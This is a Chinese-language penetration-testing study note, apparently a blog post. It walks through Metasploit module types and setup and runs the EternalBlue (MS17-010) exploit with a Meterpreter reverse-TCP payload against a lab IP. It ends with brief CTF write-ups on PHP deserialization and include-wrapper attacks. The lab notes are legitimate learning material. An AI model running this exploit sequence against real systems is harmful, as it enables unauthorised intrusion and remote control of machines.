DAY3

DAY3:

MSF

基本模块

  1. Auxiliary 辅助模块-为渗透测试信息搜集提供了大量的辅助模块支持;
  2. Exploits 攻击模块-利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件;
  3. Payload 攻击载荷模块-攻击成功后促使靶机运行的一段植入代码;
  4. Post 后渗透攻击模块-收集更多信息或进一步访问被利用的目标系统;
  5. Encoders 编码模块-将攻击载荷进行编码,来绕过防护软件拦截。

基本运行

  1. 开启数据库:service postgresql start
    在这里插入图片描述

  2. 初始化msf数据库:msfdb.init

  3. 开启MSF:msfconsole
    在这里插入图片描述
    在这里插入图片描述

  4. 查看数据链接状态:db_status
    在这里插入图片描述图片可知:已选择postgresql,没有连接。

  5. 可直接输入help/?,查看帮助菜单

在这里插入图片描述
简单的帮助指令:
help/? 帮助菜单
exit 退出msf
Back 返回
info 显示一个或者多个模块的信息
show 显示所给类型的模块
background 将当前操作在后台运行
use 选择使用模块
sessions 查看会话

基本流程

  1. 扫描靶机
    use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述输入后,可以输入info,查看模块信息。
info
在这里插入图片描述查看需要设置的选项:
show options
在这里插入图片描述
设置rhosts
set rhosts 192.168.221.129
在这里插入图片描述再进行扫描一下
exploit
在这里插入图片描述如果有一个小绿色[+],则发现它是一个可以被进攻的目标。它会显示window版本等。

由上图可知:
msf5辅助(scanner/smb/smb_ms17_010)>利用漏洞
192.168.221.129:445-已扫描1台主机(100%完成)
辅助模块执行完成。

辅助模块执行完成后,进入攻击模块。
所以先放回back.
在这里插入图片描述然后输入:
search type:exploit name:ms17
在这里插入图片描述先看 rank为yes的,选定第一个,
选定exploit/windows/smb/ms17_010_eternalblue,输入这个:
use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述再进行info查看该模块信息,

在这里插入图片描述再查看需要设置的options,输入options,在输入set rhosts 192.168.221.129,类似于上个模块的操作。

然后,再收取会话。输入:show payloads
在这里插入图片描述由此可知,对方是windows7。

然后,设置会话,set payload windows/x64/meterpreter/reverse_tcp
,然后再options,是为了让payload设置监听
在这里插入图片描述在这里插入图片描述设置完成后,运行,run/exploit,得到会话。

在这里插入图片描述由上可知:
[-]处理程序无法绑定到192.168.221.135:4444:–
[]已在0.0.0.0:4444上启动反向TCP处理程序
[-]192.168.221.129:445-攻击因失败而中止:不易受攻击:将ForceExploit设置为override
[
]攻击已完成,但未创建会话。

如果攻击成功,则会在末尾,发出“==== win ====”标志。

做题

  1. 题目:unserialize3
    在这里插入图片描述在这里插入图片描述

自己的思路:由题目可知,这是个有关于序列化的问题。
用到的知识点:反序列化、wakeup函数、code参数
解题步骤:
先增加一个对象的属性个数进行绕过;然后在编辑php输出序列化字符串,输出得出。
在这里插入图片描述
发现,有差别,
在这里插入图片描述payload后:
在这里插入图片描述得到flag:
在这里插入图片描述
2. 题目:Web_php_include
在这里插入图片描述题目中:文件include搜索字符串在另一个字符串中是否存在
用到strstr(),str_replace()以其它字符替换字符串中的一些字符
,data伪协议代码执行.

在这里插入图片描述输入到网页里,然后网页弹出在这里插入图片描述
在这里插入图片描述再输入进网页,然后,点击查看器。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值